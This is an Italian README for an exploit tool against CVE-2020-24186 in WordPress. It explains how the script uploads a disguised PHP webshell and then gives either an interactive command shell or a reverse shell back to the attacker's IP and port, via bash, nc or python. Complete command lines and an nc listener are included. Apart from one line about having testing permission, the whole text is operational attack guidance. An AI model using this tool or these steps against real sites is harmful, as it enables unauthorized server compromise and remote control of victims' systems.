
Questo script sfrutta la vulnerabilità CVE-2020-24186 in WordPress per caricare un payload PHP camuffato e ottenere una shell sul sistema target. Sono disponibili tre modalità di funzionamento:
Shell interattiva:
Carica la webshell di base e entra in modalità interattiva, permettendoti di inviare comandi tramite il parametro cmd.
Reverse Shell manuale:
Carica la webshell e invia il payload della reverse shell, ma non avvia automaticamente un listener. Devi avviare manualmente il tuo listener sull'IP e sulla porta specificati.
Reverse Shell con pwntools:
Carica la webshell, invia il payload della reverse shell e lo script avvia automaticamente un listener usando pwntools per catturare la connessione inversa.
requestspwn (pwntools)--url: URL di base del sito target (es., http://10.10.110.119).--blogpath: Percorso del post (predefinito: /?page=1).--mode: Modalità di funzionamento, interactive o reverse.--lhost: IP locale per la reverse shell (richiesto in modalità reverse).--lport: Porta locale per la reverse shell (richiesta in modalità reverse).--reverse_method: Metodo per la reverse shell: bash, nc o python (predefinito bash).--manual: Se usato in modalità reverse, lo script non avvia il listener; devi avviare manualmente il tuo listener.--use-proxy: Se impostato, le richieste verranno inviate tramite il proxy configurato.Carica una webshell e avvia una sessione interattiva per inviare comandi:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
Carica la webshell, invia il payload della reverse shell, ma non avviare automaticamente un listener. Avvia manualmente il tuo listener (ad esempio, usando netcat):
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
Quindi, in un altro terminale, avvia manualmente il tuo listener:
nc -lvnp 9002
Carica la webshell, invia il payload della reverse shell e fai in modo che lo script avvii automaticamente un listener con pwntools per catturare la connessione:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
Lo script attenderà una connessione su 10.10.1.1:9002 e, una volta connesso, fornirà una shell interattiva.
Note Assicurati che il sito target sia vulnerabile a CVE-2020-24186 e di avere i permessi necessari per i test di sicurezza. Puoi modificare il payload PHP usando l'opzione --php_payload se sono necessarie modifiche. Ricontrolla le impostazioni del proxy se usi il flag --use-proxy.